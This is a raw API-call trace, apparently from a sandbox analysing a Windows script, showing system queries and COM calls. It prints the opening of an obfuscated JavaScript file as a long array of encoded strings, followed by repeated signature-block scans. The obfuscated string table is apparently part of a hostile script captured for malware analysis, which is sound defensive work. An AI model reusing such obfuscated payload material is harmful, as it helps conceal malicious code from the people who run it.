	[0096.428] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19c690 | out: lpSystemTimeAsFileTime=0x19c690*(dwLowDateTime=0xb1ccf1d0, dwHighDateTime=0x1d543d1)) 
	[0096.428] GetCurrentProcessId () returned 0xa34
	[0096.428] GetCurrentThreadId () returned 0x358
	[0096.428] GetTickCount () returned 0x28a63
	[0096.428] QueryPerformanceCounter (in: lpPerformanceCount=0x19c698 | out: lpPerformanceCount=0x19c698*=22085446395) returned 1
	[0096.429] malloc (_Size=0x100) returned 0x427c70
	[0096.429] __dllonexit () returned 0x7fee14814c0
	[0096.429] __dllonexit () returned 0x7fee14814e8
	[0096.429] GetVersionExA (in: lpVersionInformation=0x19c470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe1482dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe14814e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x19c470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0096.429] GetProcessWindowStation () returned 0x30
	[0096.429] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x19c458, nLength=0xc, lpnLengthNeeded=0x19c450 | out: pvInfo=0x19c458, lpnLengthNeeded=0x19c450) returned 1
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f060
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f0b0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f0e0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f120
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f160
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f1a0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f1e0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f220
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f260
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f2a0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f2e0
	[0096.429] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f330
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f370
	[0096.429] DllGetClassObject (in: rclsid=0x22e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19d160 | out: ppv=0x19d160*=0x42f0b0) returned 0x0
	[0096.429] ??2@YAPEAX_K@Z () returned 0x42f0b0
	[0096.430] IClassFactory:CreateInstance (in: This=0x42f0b0, pUnkOuter=0x0, riid=0x19df40*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x19d180 | out: ppvObject=0x19d180*=0x42f4c0) returned 0x0
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f3b0
	[0096.430] GetSystemInfo (in: lpSystemInfo=0x19cfc0 | out: lpSystemInfo=0x19cfc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0096.430] VirtualQuery (in: lpAddress=0x19d030, lpBuffer=0x19cff0, dwLength=0x30 | out: lpBuffer=0x19cff0*(BaseAddress=0x19d000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f3f0
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f410
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f470
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f4a0
	[0096.430] ??2@YAPEAX_K@Z () returned 0x42f550
	[0096.430] IUnknown:AddRef (This=0x42f4c0) returned 0x2
	[0096.430] IUnknown:Release (This=0x42f4c0) returned 0x1
	[0096.430] IUnknown:Release (This=0x42f0b0) returned 0x0
	[0096.430] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.430] IUnknown:QueryInterface (in: This=0x42f4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x19e3c8 | out: ppvObject=0x19e3c8*=0x42f4c0) returned 0x0
	[0096.430] IUnknown:Release (This=0x42f4c0) returned 0x1
	[0096.431] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0096.431] IsTextUnicode (in: lpv=0x42a4f0, iSize=19304, lpiResult=0x19e418 | out: lpiResult=0x19e418) returned 0
	[0096.431] GetACP () returned 0x4e4
	[0096.431] malloc (_Size=0x97d0) returned 0x43dfd0
	[0096.431] GetACP () returned 0x4e4
	[0096.431] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x42a4f0, cbMultiByte=19304, lpWideCharStr=0x43dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0096.432] realloc (_Block=0x43dfd0, _Size=0x96d0) returned 0x43dfd0
	[0096.432] ??2@YAPEAX_K@Z () returned 0x42f0b0
	[0096.433] free (_Block=0x43dfd0) 
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] CoUninitialize () 
	[0096.433] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0096.433] CloseHandle (hObject=0x140) returned 1
	[0096.433] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0096.433] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0096.433] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.433] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0096.433] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0096.433] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.433] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.433] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.433] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.433] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.433] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.433] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0096.433] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.433] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.433] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.433] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0096.433] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0096.433] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.433] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0096.433] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0096.433] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0096.433] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0096.433] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.434] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.434] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.434] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0096.434] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0096.434] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0096.434] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.434] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0096.434] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.434] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.434] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0096.434] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0096.434] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.434] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.434] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0096.434] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0096.434] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0096.434] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0096.434] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.434] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.434] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.434] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.434] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.434] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.434] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.434] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0096.434] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0096.434] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.434] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.434] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.434] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0096.434] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.434] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0096.434] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.434] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.434] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.434] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.434] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0096.435] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.435] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0096.435] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0096.435] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0096.435] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.435] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.435] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.435] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.435] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.435] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.435] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.435] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0096.435] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.435] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0096.435] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.435] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.435] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0096.435] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.435] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.435] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.435] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0096.435] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.435] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0096.435] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0096.435] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
